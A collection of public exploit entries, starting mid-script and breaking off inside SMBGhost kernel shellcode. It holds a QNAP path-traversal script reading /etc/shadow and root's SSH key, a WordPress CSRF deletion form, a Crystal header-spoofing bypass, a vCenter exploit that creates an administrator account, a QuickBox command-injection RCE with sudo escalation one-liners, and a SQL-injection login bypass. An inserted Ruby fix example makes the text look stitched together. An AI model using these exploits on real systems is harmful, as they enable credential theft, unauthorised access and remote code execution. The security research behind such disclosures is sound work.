    file_read_response = req.post(url + "/photo/p/api/video.php", data=post_data, headers=headers, verify=False, timeout=10)
    print("="*65) ; print("{0} file content;\n{1}" .format(file,file_read_response.text))

# print banner
get_banner()

if len(sys.argv) != 2:
    print("\033[93mUsage : python3 gundy.py https://vulnerable_url:port\033[0m")
    sys.exit(-1)

url = sys.argv[1].rstrip('/')
headers = {"User-Agent": "Gundy - QNAP RCE"}

# for session cookie
req = requests.Session()

#######################################################################
# search album_id
print("="*65)
post_data = {'a': 'setSlideshow', 'f': 'qsamplealbum'}
album_id_response = req.post(url + "/photo/p/api/album.php", data=post_data, headers=headers, verify=False, timeout=10)
if album_id_response.status_code != 200:
    print("album id not found \n\033[91mnot vulnerable\033[0m")
    sys.exit(0)
album_id = re.search('(?<=<output>).*?(?=</output>)', album_id_response.text).group()
print("album_id ==> " + album_id)

#######################################################################
# search $_SESSION['access_code']
access_code_response = req.get(url + "/photo/slideshow.php?album=" + album_id, headers=headers, verify=False, timeout=10)
if access_code_response.status_code != 200:
    print("slideshow not found \n\033[91mnot vulnerable\033[0m")
    sys.exit(0)
access_code = re.search("(?<=encodeURIComponent\\(').*?(?=')", access_code_response.text).group()
print("access_code ==> " + access_code)

#######################################################################
# /etc/passwd file read
get_file_content('./../../../../../etc/passwd')
# /etc/shadow read
get_file_content('./../../../../../etc/shadow')
# /etc/hostname read
get_file_content('./../../../../../etc/hostname')
# /root/.ssh/id_rsa read
get_file_content('./../../../../../root/.ssh/id_rsa')
#######################################################################
```
-
WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)
# Exploit Title: WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)
# Google Dork: N/A
# Date: 2020-05-21
# Exploit Author: UnD3sc0n0c1d0
# Vendor Homepage: https://www.bdtask.com/
# Software Link: https://downloads.wordpress.org/plugin/multi-scheduler.1.0.0.zip
# Category: Web Application
# Version: 1.0.0
# Tested on: CentOS 7 / WordPress 5.4.1
# CVE : N/A

# 1. Technical Description:
The Multi-Scheduler plugin 1.0.0 for WordPress has a Cross-Site Request Forgery (CSRF) vulnerability in the forms it presents, allowing the possibility of deleting records (users) when an ID is known.

# 2. Proof of Concept (PoC):

```html
<html>
<form method="POST" action="http://[TARGET]/wp-admin/admin.php?page=msbdt_professional">
  <input type="hidden" value="[ID]" name="pro_delete_id"><br>
  <input type="hidden" value="Delete" name="professional_delete">
  <input type="submit" value="Delete user">
</form>
</html>
```
-
Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass
# Exploit Title : Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass
# Exploit Author : Halis Duraki (@0xduraki)
# Date : 2020-05-28
# Product : http-protection (Crystal Shard)
# Product URI : https://github.com/rogeriozambon/http-protection
# Version : http-protection <= 0.2.0
# CVE : N/A

## About the product

This library/shard (http-protection) protects against typical web attacks within Crystal applications. It was inspired by the rack-protection Ruby gem. It is an open-source product developed by Rogério Zambon in Brazil. The total number of installs and respective usage is not known (no available information), but the shard gets traction on Crystal's official channels (Crystal's ANN, Gitter, and Shardbox).

## About the exploit

The `IpSpoofing` middleware detects spoofing attacks (and likewise, should prevent them). Both of these functionalities can be bypassed by enumerating and hardcoding `X-*` header values. The middleware works by detecting a difference between the IP address values of `X-Forwarded-For` and `X-Real-IP`/`X-Client-IP`. If the values mismatch, the middleware protects the application by forcing a `403 (Forbidden)` response.

Relevant code (src/http-protection/ip_spoofing.cr):

```crystal
module HTTP::Protection
  class IpSpoofing
    ...
    def call(... ctx)
      ...
      ips = headers["X-Forwarded-For"].split(/\s*,\s*/)
      return forbidden(context) if headers.has_key?("X-Client-IP") && !ips.includes?(headers["X-Client-IP"])
      return forbidden(context) if headers.has_key?("X-Real-IP") && !ips.includes?(headers["X-Real-IP"])
      ...
    end
  end
end
```

The exploit works by hardcoding the same constant IP address into all of the protection request headers. The standard format for `X-Forwarded-For` from the MDN reference lists those values as: `X-Forwarded-For: <client>, <proxy1>, <proxy2>`. HTTP request headers such as X-Forwarded-For, True-Client-IP, and X-Real-IP are not a robust foundation on which to build any security measures, such as access controls.

@see CWE-16: https://cwe.mitre.org/data/definitions/16.html

## PoC (Proof of Concept)

* Set a breakpoint on the request, or intercept the request.
* Hardcode all three request headers:
  * X-Forwarded-For: 123.123.123.123
  * X-Client-IP: 123.123.123.123
  * X-Real-IP: 123.123.123.123
* Continue the request.
* Response should be 200 OK, otherwise, 400 Forbidden.

++ Request example (POC):

```
GET / HTTP/1.1
Host: localhost.:8081
X-Forwarded-For: 123.123.123.123
X-Client-IP: 123.123.123.123
X-Real-IP: 123.123.123.123
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
```

++ Response (POC):

```
200 OK
```

## Fix

It is advised to fix the IpSpoofing detection by checking socket data directly instead of relying on passed header keys/values. The other solution is to force the proxy to dismiss such data (on request) and use the original source (proxified).

==============================================================================================================
+ Halis Duraki | [email protected] | @0xduraki | https://duraki.github.io
==============================================================================================================
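The fix the advisory recommends, anchoring on socket data rather than on header agreement, worked through as an added Ruby example (not the shard's code, and not Crystal): a resolver that starts from the TCP peer address and only honours X-Forwarded-For hops appended by proxies in an explicit allow-list, shown beside a transcription of the original header-consistency check so the bypass and the fix can be compared on the advisory's own request. `ClientIpResolver`, the 10.0.0.0/8 proxy range and the peer addresses are assumptions made for illustration.

```ruby
require "ipaddr"

# Added example (not the shard's code): a client-IP resolver implementing the
# advisory's recommended fix. It anchors on the TCP peer address, which the
# remote client cannot forge, and trusts X-Forwarded-For hops only when they
# were appended by proxies in an explicit allow-list. ClientIpResolver and the
# address ranges below are assumptions made for illustration.
class ClientIpResolver
  def initialize(trusted_proxies)
    @trusted = trusted_proxies.map { |cidr| IPAddr.new(cidr) }
  end

  # nil when the value is not a syntactically valid IP address.
  def parse(ip)
    IPAddr.new(ip) rescue nil
  end

  # True when ip parses and falls inside one of the trusted proxy ranges.
  def trusted?(ip)
    addr = parse(ip)
    !addr.nil? && @trusted.any? { |net| net.include?(addr) }
  end

  # peer_ip: the socket's remote address (ctx.request.remote_address in Crystal).
  # headers: request headers as a Hash. Returns the client IP to act on.
  def resolve(peer_ip, headers)
    # A peer that is not one of our proxies *is* the client; whatever it put in
    # X-Forwarded-For / X-Real-IP / X-Client-IP is attacker-controlled and ignored.
    return peer_ip unless trusted?(peer_ip)

    chain = (headers["X-Forwarded-For"] || "").split(/\s*,\s*/).reject(&:empty?)
    # Proxies append to the right, so walk right-to-left discarding our own hops;
    # the first address we do not trust is the client our edge proxy actually saw.
    until chain.empty?
      candidate = chain.pop
      next if trusted?(candidate)
      # A malformed hop means the chain was tampered with: fall back to the peer.
      return parse(candidate) ? candidate : peer_ip
    end
    peer_ip # the chain held only trusted hops (or was empty)
  end
end

# The header-agreement check from ip_spoofing.cr, transcribed to Ruby so the
# bypass can be shown side by side with the hardened resolver.
def header_consistency_check(headers)
  ips = (headers["X-Forwarded-For"] || "").split(/\s*,\s*/)
  return :forbidden if headers.key?("X-Client-IP") && !ips.include?(headers["X-Client-IP"])
  return :forbidden if headers.key?("X-Real-IP") && !ips.include?(headers["X-Real-IP"])
  :ok
end

# Constructed sample input: the advisory's request, the same address in all
# three headers, arriving straight from an untrusted peer (no proxy in between).
SPOOFED_HEADERS = {
  "X-Forwarded-For" => "123.123.123.123",
  "X-Client-IP" => "123.123.123.123",
  "X-Real-IP" => "123.123.123.123",
}.freeze
UNTRUSTED_PEER = "203.0.113.7"   # constructed: a direct client, not a proxy
TRUSTED_PROXY = "10.0.0.5"       # constructed: our edge proxy's address

if __FILE__ == $PROGRAM_NAME
  resolver = ClientIpResolver.new(["10.0.0.0/8"])
  puts "header check on spoofed request: #{header_consistency_check(SPOOFED_HEADERS)}"
  puts "resolver on spoofed request:     #{resolver.resolve(UNTRUSTED_PEER, SPOOFED_HEADERS)}"
  puts "resolver via trusted proxy:      #{resolver.resolve(TRUSTED_PROXY, { "X-Forwarded-For" => "198.51.100.9, 10.0.0.5" })}"
end
```

The consistency check returns :ok for the spoofed request, while the resolver reports the real peer 203.0.113.7 because nothing in the headers can override a peer that is not an allow-listed proxy.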
-
VMware vCenter Server 6.7 - Authentication Bypass
```python
# Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass
# Date: 2020-06-01
# Exploit Author: Photubias
# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2020-0006.html
# Version: vCenter Server 6.7 before update 3f
# Tested on: vCenter Server Appliance 6.7 RTM (updated from v6.0)
# CVE: CVE-2020-3952

#!/usr/bin/env python3
'''
    Copyright 2020 Photubias(c)

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.

    Based (and reverse engineerd from): https://github.com/guardicore/vmware_vcenter_cve_2020_3952

    File name CVE-2020-3592.py
    written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be

    ## Vulnerable setup (requirements): vCenter Server 6.7 that was upgraded from 6.x

    This is a native implementation without requirements, written in Python 3.
    Works equally well on Windows as Linux (as MacOS, probably ;-)

    Features: exploit + vulnerability checker
'''
import binascii, socket, sys, string, random

## Default vars; change at will
_sIP = '192.168.50.35'
_iPORT = 389
_iTIMEOUT = 5

def randomString(iStringLength=8):
    #sLetters = string.ascii_lowercase
    sLetters = string.ascii_letters
    return ''.join(random.choice(sLetters) for i in range(iStringLength))

def getLengthPrefix(sData, sPrefix, hexBytes=1):
    ## sData is hexlified
    ## This will calculate the length of the string, and verify if an additional '81' or '82' prefix is needed
    sReturn = sPrefix
    if (len(sData) / 2 ) > 255:
        sReturn += b'82'
        hexBytes = 2
    elif (len(sData) /2 ) >= 128:
        sReturn += b'81'
    sReturn += f"{int(len(sData)/2):#0{(hexBytes*2)+2}x}"[2:].encode()
    return sReturn

def buildBindRequestPacket(sUser, sPass):
    sUser = binascii.hexlify(sUser.encode())
    sPass = binascii.hexlify(sPass.encode())
    ## Packet Construction
    sPacket = getLengthPrefix(sPass, b'80') + sPass
    sPacket = getLengthPrefix(sUser, b'04') + sUser + sPacket
    sPacket = b'020103' + sPacket
    sPacket = getLengthPrefix(sPacket, b'60') + sPacket
    sPacket = b'020101' + sPacket
    sPacket = getLengthPrefix(sPacket, b'30') + sPacket
    #print(sPacket)
    return binascii.unhexlify(sPacket)

def buildUserCreatePacket(sUser, sPass):
    sUser = binascii.hexlify(sUser.encode())
    sPass = binascii.hexlify(sPass.encode())

    def createAttribute(sName, sValue):
        sValue = getLengthPrefix(sValue, b'04') + sValue
        sName = getLengthPrefix(sName, b'04') + sName
        sReturn = getLengthPrefix(sValue, b'31') + sValue
        sReturn = sName + sReturn
        sReturn = getLengthPrefix(sReturn, b'30') + sReturn
        return sReturn

    def createObjectClass():
        sReturn = getLengthPrefix(binascii.hexlify(b'top'), b'04') + binascii.hexlify(b'top')
        sReturn += getLengthPrefix(binascii.hexlify(b'person'), b'04') + binascii.hexlify(b'person')
        sReturn += getLengthPrefix(binascii.hexlify(b'organizationalPerson'), b'04') + binascii.hexlify(b'organizationalPerson')
        sReturn += getLengthPrefix(binascii.hexlify(b'user'), b'04') + binascii.hexlify(b'user')
        sReturn = getLengthPrefix(sReturn, b'31') + sReturn
        sReturn = getLengthPrefix(binascii.hexlify(b'objectClass'), b'04') + binascii.hexlify(b'objectClass') + sReturn
        sReturn = getLengthPrefix(sReturn, b'30') + sReturn
        return sReturn

    ## Attributes
    sAttributes = createAttribute(binascii.hexlify(b'vmwPasswordNeverExpires'), binascii.hexlify(b'True'))
    sAttributes += createAttribute(binascii.hexlify(b'userPrincipalName'), sUser + binascii.hexlify(b'@VSPHERE.LOCAL'))
    sAttributes += createAttribute(binascii.hexlify(b'sAMAccountName'), sUser)
    sAttributes += createAttribute(binascii.hexlify(b'givenName'), sUser)
    sAttributes += createAttribute(binascii.hexlify(b'sn'), binascii.hexlify(b'vsphere.local'))
    sAttributes += createAttribute(binascii.hexlify(b'cn'), sUser)
    sAttributes += createAttribute(binascii.hexlify(b'uid'), sUser)
    sAttributes += createObjectClass()
    sAttributes += createAttribute(binascii.hexlify(b'userPassword'), sPass)
    ## CN
    sCN = binascii.hexlify(b'cn=') + sUser + binascii.hexlify(b',cn=Users,dc=vsphere,dc=local')
    sUserEntry = getLengthPrefix(sCN, b'04') + sCN
    ## Packet Assembly (bottom up)
    sPacket = getLengthPrefix(sAttributes, b'30') + sAttributes
    sPacket = sUserEntry + sPacket
    sPacket = getLengthPrefix(sPacket, b'02010268', 2) + sPacket
    sPacket = getLengthPrefix(sPacket, b'30') + sPacket
    #print(sPacket)
    return binascii.unhexlify(sPacket)

def buildModifyUserPacket(sUser):
    sFQDN = binascii.hexlify(('cn=' + sUser + ',cn=Users,dc=vsphere,dc=local').encode())
    sCN = binascii.hexlify(b'cn=Administrators,cn=Builtin,dc=vsphere,dc=local')
    sMember = binascii.hexlify(b'member')
    ## Packet Construction
    sPacket = getLengthPrefix(sFQDN, b'04') + sFQDN
    sPacket = getLengthPrefix(sPacket, b'31') + sPacket
    sPacket = getLengthPrefix(sMember, b'04') + sMember + sPacket
    sPacket = getLengthPrefix(sPacket, b'0a010030') + sPacket
    sPacket = getLengthPrefix(sPacket, b'30') + sPacket
    sPacket = getLengthPrefix(sPacket, b'30') + sPacket
    sPacket = getLengthPrefix(sCN, b'04') + sCN + sPacket
    sPacket = getLengthPrefix(sPacket, b'02010366') + sPacket
    sPacket = getLengthPrefix(sPacket, b'30') + sPacket
    #print(sPacket)
    return binascii.unhexlify(sPacket)

def performBind(s):
    ## Trying to bind, fails, but necessary (even fails when using correct credentials)
    dPacket = buildBindRequestPacket('[email protected]','www.IC4.be')
    s.send(dPacket)
    sResponse = s.recv(1024)
    try:
        sResponse = sResponse.split(b'\x04\x00')[0][-1:]
        sCode = binascii.hexlify(sResponse).decode()
        if sCode == '31': print('[+] Ok, service reachable, continuing')
        else: print('[-] Something went wrong')
    except: pass
    return sCode

def performUserAdd(s, sUser, sPass):
    dPacket = buildUserCreatePacket(sUser,sPass)
    s.send(dPacket)
    sResponse = s.recv(1024)
    try:
        sCode = sResponse.split(b'\x04\x00')[0][-1:]
        sMessage = sResponse.split(b'\x04\x00')[1]
        if sCode == b'\x00': print('[+] Success! User ' + sUser + '@vsphere.local added with password ' + sPass)
        elif sCode == b'\x32': print('[-] Error, this host is not vulnerable (insufficientAccessRights)')
        else:
            if sMessage[2] == b'81': sMessage = sMessage[3:].decode()
            else: sMessage = sMessage[2:].decode()
            print('[-] Error, user not added, message received: ' + sMessage)
    except: pass
    return sCode

def performUserMod(s, sUser, verbose = True):
    dPacket = buildModifyUserPacket(sUser)
    s.send(dPacket)
    sResponse = s.recv(1024)
    try:
        sCode = sResponse.split(b'\x04\x00')[0][-1:]
        sMessage = sResponse.split(b'\x04\x00')[1]
        if sCode == b'\x00':
            if verbose: print('[+] User modification success (if the above is OK).')
        else:
            if sMessage[2] == b'81': sMessage = sMessage[3:].decode()
            else: sMessage = sMessage[2:].decode()
            if verbose: print('[-] Error during modification, message received: ' + sMessage)
    except: pass
    return sCode, sMessage

def performUnbind(s):
    try: s.send(b'\x30\x05\x02\x01\x04\x42\x00')
    except: pass

def main():
    global _sIP, _iPORT, _iTIMEOUT
    _sUSER = 'user_' + randomString(6)
    _sPASS = randomString(8) + '_2020'
    bAdduser = False
    if len(sys.argv) == 1:
        print('[!] No arguments found: python3 CVE-2020-3592.py <dstIP> [<newUsername>] [<newPassword>]')
        print('    Example: ./CVE-2020-3592.py ' + _sIP + ' ' + _sUSER + ' ' + _sPASS)
        print('    Leave username & password empty for a vulnerability check')
        print('    Watch out for vCenter/LDAP password requirements, leave empty for random password')
        print('    But for now, I will ask questions')
        sAnswer = input('[?] Please enter the vCenter IP address [' + _sIP + ']: ')
        if not sAnswer == '': _sIP = sAnswer
        sAnswer = input('[?] Want to perform a check only? [Y/n]: ')
        if sAnswer.lower() == 'n': bAdduser = True
        if bAdduser:
            sAnswer = input('[?] Please enter the new username to add [' + _sUSER + ']: ')
            if not sAnswer == '': _sUSER = sAnswer
            sAnswer = input('[?] Please enter the new password for this user [' + _sPASS + ']: ')
            if not sAnswer == '': _sPASS = sAnswer
    else:
        _sIP = sys.argv[1]
        if len(sys.argv) >= 3:
            _sUSER = sys.argv[2]
            bAdduser = True
        if len(sys.argv) >= 4: _sPASS = sys.argv[3]

    ## MAIN
    print('')
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(_iTIMEOUT)
    try: s.connect((_sIP,_iPORT))
    except:
        print('[-] Error: Host ' + _sIP + ':' + str(_iPORT) + ' not reachable')
        sys.exit(1)
    performBind(s)
    if bAdduser: sCode = performUserAdd(s, _sUSER, _sPASS)
    if not bAdduser:
        print('[!] Checking vulnerability')
        sCode, sMessage = performUserMod(s, 'Administrator', False)
        if sCode == b'\x32': print('[-] This host is not vulnerable, message: ' + sMessage)
        else: print('[+] This host is vulnerable!')
    else:
        sCode = performUserMod(s, _sUSER)
    performUnbind(s)
    s.close()

if __name__ == "__main__":
    main()
```
-
QuickBox Pro 2.1.8 - Authenticated Remote Code Execution
```python
# Exploit Title: QuickBox Pro 2.1.8 - Authenticated Remote Code Execution
# Date: 2020-05-26
# Exploit Author: s1gh
# Vendor Homepage: https://quickbox.io/
# Vulnerability Details: https://s1gh.sh/cve-2020-13448-quickbox-authenticated-rce/
# Version: <= 2.1.8
# Description: An authenticated low-privileged user can exploit a command injection vulnerability to get code-execution as www-data and escalate privileges to root due to weak sudo rules.
# Tested on: Debian 9
# CVE: CVE-2020-13448
# References: https://github.com/s1gh/QuickBox-Pro-2.1.8-Authenticated-RCE

'''
Privilege escalation:
After getting a reverse shell as the www-data user you can escalate to root in one of two ways.

1. sudo mysql -e '\! /bin/sh'
2. sudo mount -o bind /bin/sh /bin/mount;sudo mount
'''

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import requests
import argparse
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from urllib.parse import quote_plus

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def exploit(args):
    s = requests.Session()
    print('[*] Sending our payload...')
    s.post('https://' + args.ip + '/inc/process.php', data={'username': args.username, 'password': args.password, 'form_submission': 'login'}, verify=False)
    try:
        s.get('https://' + args.ip + '/index.php?id=88&servicestart=a;' + quote_plus(args.cmd) + ';', verify=False)
    except requests.exceptions.ReadTimeout:
        pass

def main():
    parser = argparse.ArgumentParser(description="Authenticated RCE for QuickBox Pro <= v2.1.8")
    parser.add_argument('-i',dest='ip',required=True,help="Target IP Address")
    parser.add_argument('-u',dest='username',required=True,help="Username")
    parser.add_argument('-p',dest='password',required=True,help="Password")
    parser.add_argument('-c',dest='cmd', required=True, help="Command to execute")
    args = parser.parse_args()
    exploit(args)

if __name__ == '__main__':
    main()
    sys.exit(0)
```
-
Clinic Management System 1.0 - Authentication Bypass
# Exploit Title: Clinic Management System 1.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-06-02
# Exploit Author: BKpatron
# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# my website: bkpatron.com

# Vulnerability: Attacker can bypass the login page and access the dashboard page
# vulnerable file : login.php
# Parameter & Payload: '=''or'

# Proof of Concept:
http://localhost/source%20code/login.php

POST /source%20code/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
Referer: http://localhost/source%20code/login.php
Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

user=admin&email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btn_login=: undefined

HTTP/1.1 200 OK
Date: Mon, 01 Jun 2020 19:52:17 GMT
Server: Apache/2.4.39 (Win64) PHP/7.2.18
X-Powered-By: PHP/7.2.18
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4726
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Microsoft Windows - 'SMBGhost' Remote Code Execution
````python
#!/usr/bin/env python
'''
# EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48537.zip

# SMBGhost_RCE_PoC
RCE PoC for CVE-2020-0796 "SMBGhost"

For demonstration purposes only! Only use this as a reference. Seriously. This has not been tested outside of my lab environment. It was written quickly and needs some work to be more reliable. Sometimes you BSOD. Using this for any purpose other than self education is an extremely bad idea. Your computer will burst in flames. Puppies will die.

Now that that's out of the way....

Usage ex:
```
$SMBGhost_RCE_PoC python exploit.py -ip 192.168.142.131
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff79480000000
[+] ntoskrnl entry at fffff80645792010
[+] found PML4 self-ref entry 1eb
[+] found HalpInterruptController at fffff79480001478
[+] found HalpApicRequestInterrupt at fffff80645cb3bb0
[+] built shellcode!
[+] KUSER_SHARED_DATA PTE at fffff5fbc0000000
[+] KUSER_SHARED_DATA PTE NX bit cleared!
[+] Wrote shellcode at fffff78000000a00!
[+] Press a key to execute shellcode!
[+] overwrote HalpInterruptController pointer, should have execution shortly...
```

Replace payload in USER_PAYLOAD in exploit.py. Max of 600 bytes. If you want more, modify the kernel shell code yourself.

lznt1 code from [here](https://github.com/you0708/lznt1). Modified to add a "bad compression" function to corrupt SRVNET buffer header without causing a crash.

See this excellent write up by Ricerca Security for more details on the methods I used: https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html
'''
import sys
import socket
import struct
import argparse
from lznt1 import compress, compress_evil
from smb_win import smb_negotiate, smb_compress

# Use lowstub jmp bytes to signature search
LOWSTUB_JMP = 0x1000600E9
# Offset of PML4 pointer in lowstub
PML4_LOWSTUB_OFFSET = 0xA0
# Offset of lowstub virtual address in lowstub
SELFVA_LOWSTUB_OFFSET = 0x78
# Offset of NTOSKRNL entry address in lowstub
NTENTRY_LOWSTUB_OFFSET = 0x278
# Offset of hal!HalpApicRequestInterrupt pointer in hal!HalpInterruptController
HALP_APIC_REQ_INTERRUPT_OFFSET = 0x78
KUSER_SHARED_DATA = 0xFFFFF78000000000
# Offset of pNetRawBuffer in SRVNET_BUFFER_HDR
PNET_RAW_BUFF_OFFSET = 0x18
# Offset of pMDL1 in SRVNET_BUFFER_HDR
PMDL1_OFFSET = 0x38

# Shellcode from kernel_shellcode.asm
KERNEL_SHELLCODE = b"\x41\x50\x41\x51\x41\x55\x41\x57\x41\x56\x51\x52\x53\x56\x57\x4C"
KERNEL_SHELLCODE += b"\x8D\x35\xA0\x02\x00\x00\x49\x8B\x86\xD0\x00\x00\x00\x49\x8B\x9E"
KERNEL_SHELLCODE += b"\xD8\x00\x00\x00\x48\x89\x18\xFB\x49\x8B\x86\xE0\x00\x00\x00\x48"
KERNEL_SHELLCODE += b"\x2D\x00\x10\x00\x00\x66\x81\x38\x4D\x5A\x75\xF3\x49\x89\xC7\x4D"
KERNEL_SHELLCODE += b"\x89\xBE\xE0\x00\x00\x00\xBF\x78\x7C\xF4\xDB\xE8\xDA\x00\x00\x00"
KERNEL_SHELLCODE += b"\x49\x89\xC5\xBF\x3F\x5F\x64\x77\xE8\x2E\x01\x00\x00\x48\x89\xC1"
KERNEL_SHELLCODE += b"\xBF\xE1\x14\x01\x17\xE8\x21\x01\x00\x00\x48\x89\xC2\x48\x83\xC2"
KERNEL_SHELLCODE += b"\x08\x49\x8D\x74\x0D\x00\xE8\xFF\x00\x00\x00\x3D\xD8\x83\xE0\x3E"
KERNEL_SHELLCODE += b"\x74\x0A\x4D\x8B\x6C\x15\x00\x49\x29\xD5\xEB\xE5\xBF\x48\xB8\x18"
KERNEL_SHELLCODE += b"\xB8\x4C\x89\xE9\xE8\x91\x00\x00\x00\x49\x89\x06\x4D\x8B\x4D\x30"
KERNEL_SHELLCODE += b"\x4D\x8B\x45\x38\x49\x81\xE8\xF8\x02\x00\x00\x48\x31\xF6\x49\x81"
KERNEL_SHELLCODE += b"\xE9\xF8\x02\x00\x00\x41\x8B\x79\x74\x0F\xBA\xE7\x04\x73\x05\x4C"
````
KERNEL_SHELLCODE += b"\x89\xCE\xEB\x0C\x4D\x39\xC8\x4D\x8B\x89\xF8\x02\x00\x00\x75\xDE" KERNEL_SHELLCODE += b"\x48\x85\xF6\x74\x40\x49\x8D\x4E\x08\x48\x89\xF2\x4D\x31\xC0\x4C" KERNEL_SHELLCODE += b"\x8D\x0D\xB9\x00\x00\x00\x52\x41\x50\x41\x50\x41\x50\xBF\xC4\x5C" KERNEL_SHELLCODE += b"\x19\x6D\x48\x83\xEC\x20\xE8\x2F\x00\x00\x00\x48\x83\xC4\x40\x49" KERNEL_SHELLCODE += b"\x8D\x4E\x08\xBF\x34\x46\xCC\xAF\x48\x83\xEC\x20\xE8\x19\x00\x00" KERNEL_SHELLCODE += b"\x00\x48\x83\xC4\x20\xFA\x48\x89\xD8\x5F\x5E\x5B\x5A\x59\x41\x5E" KERNEL_SHELLCODE += b"\x41\x5F\x41\x5D\x41\x59\x41\x58\xFF\xE0\xE8\x02\x00\x00\x00\xFF" KERNEL_SHELLCODE += b"\xE0\x53\x51\x56\x41\x8B\x47\x3C\x4C\x01\xF8\x8B\x80\x88\x00\x00" KERNEL_SHELLCODE += b"\x00\x4C\x01\xF8\x50\x8B\x48\x18\x8B\x58\x20\x4C\x01\xFB\xFF\xC9" KERNEL_SHELLCODE += b"\x8B\x34\x8B\x4C\x01\xFE\xE8\x1F\x00\x00\x00\x39\xF8\x75\xEF\x58" KERNEL_SHELLCODE += b"\x8B\x58\x24\x4C\x01\xFB\x66\x8B\x0C\x4B\x8B\x58\x1C\x4C\x01\xFB" KERNEL_SHELLCODE += b"\x8B\x04\x8B\x4C\x01\xF8\x5E\x59\x5B\xC3\x52\x31\xC0\x99\xAC\xC1" KERNEL_SHELLCODE += b"\xCA\x0D\x01\xC2\x85\xC0\x75\xF6\x92\x5A\xC3\xE8\xA1\xFF\xFF\xFF" KERNEL_SHELLCODE += b"\x80\x78\x02\x80\x77\x05\x0F\xB6\x40\x03\xC3\x8B\x40\x03\xC3\x41" KERNEL_SHELLCODE += b"\x57\x41\x56\x57\x56\x48\x8B\x05\x0A\x01\x00\x00\x48\x8B\x48\x18" KERNEL_SHELLCODE += b"\x48\x8B\x49\x20\x48\x8B\x09\x66\x83\x79\x48\x18\x75\xF6\x48\x8B" KERNEL_SHELLCODE += b"\x41\x50\x81\x78\x0C\x33\x00\x32\x00\x75\xE9\x4C\x8B\x79\x20\xBF" KERNEL_SHELLCODE += b"\x5E\x51\x5E\x83\xE8\x58\xFF\xFF\xFF\x49\x89\xC6\x4C\x8B\x3D\xB3" KERNEL_SHELLCODE += b"\x01\x00\x00\x31\xC0\x44\x0F\x22\xC0\x48\x8D\x15\x8E\x01\x00\x00" KERNEL_SHELLCODE += b"\x89\xC1\x48\xF7\xD1\x49\x89\xC0\xB0\x40\x50\xC1\xE0\x06\x50\x49" KERNEL_SHELLCODE += b"\x89\x01\x48\x83\xEC\x20\xBF\xEA\x99\x6E\x57\xE8\x1A\xFF\xFF\xFF" KERNEL_SHELLCODE += b"\x48\x83\xC4\x30\x48\x8B\x3D\x63\x01\x00\x00\x48\x8D\x35\x77\x00" KERNEL_SHELLCODE += 
